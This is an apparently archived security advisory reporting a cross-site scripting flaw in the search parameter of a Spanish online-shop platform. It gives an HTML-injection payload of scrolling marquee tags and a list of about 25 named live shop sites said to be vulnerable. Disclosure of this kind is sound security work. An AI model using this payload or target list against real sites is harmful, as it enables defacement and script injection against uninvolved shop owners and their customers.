Tienda-Online-Economica suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
62ff9834c5c84f12eb4aff43ae6bea0e8a355fae7ff4fe8fd4b34bfed93abad1+=============================================================================================+
+ Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code +
+=============================================================================================+
Author(s):Ivan Sanchez
Product: Tienda online economica
Url vendor: http://www.tienda-online-economica.com
Date: 11/08/2013
Vendor Notified: 10/08/2013
Extract:
En Tienda Online Económica te ofrecemos todo lo necesario para que tengas tu tienda online lista para vender en internet en sólo 3 semanas.
Y además, con Tienda Online Económica tendrás un diseño único y personalizado para tu tienda online, especial para vender tus productos,
y servicios en Internet.
Explotation Parameter and Function:
http://DOMAIN/es/search/0
Parameter Affected:
q= XSS
Function Affected:
<form id="frm-search" action="http://www.site.com/es/search/0" class="grid_2 alpha omega" method="post">
<input id="q" name="q" type="text" value="<!-- HTML codes by Nullcode Team --> <marquee behavior="scroll" direction="left" scrollamount="10">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="40">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="50">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="60">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="70">Nullcode Team.</marquee>" />
Remediation:
Sanitize all parameters
www.evilcode.com.ar & www.nullcode.com.ar Hunting Security Bugs :-)
+=============================================================================================+
+ Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code +
+=============================================================================================+
Example a lot of sites affected.-
http://www.bienvenuebebe.es
http://www.armariodelujo.com
http://www.ifil.es
http://www.conqueletrita.com
http://www.ideariaid.com
http://www.quierotec.com
http://www.leonidas-chocoworld.com
http://www.k9barcelonastore.com
http://www.tutallernatural.com
http://www.vegaknits.com
http://www.borgiaconti.com
http://www.tuherbalonline.com
http://www.rayasdiving.com
http://www.kisscomixstore.com
http://www.energyfruits.es
http://www.culturaverde.es
http://www.romavionline.com
http://www.sinkoletas.com
http://www.tiendadelmusculo.com
http://www.aceiteshermida.com
http://www.sycbolsos.com
http://www.demar.es
www.suplementosdeportivosonline.com
http://www.pallarsgourmet.com
http://www.tusexshoponline.net
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed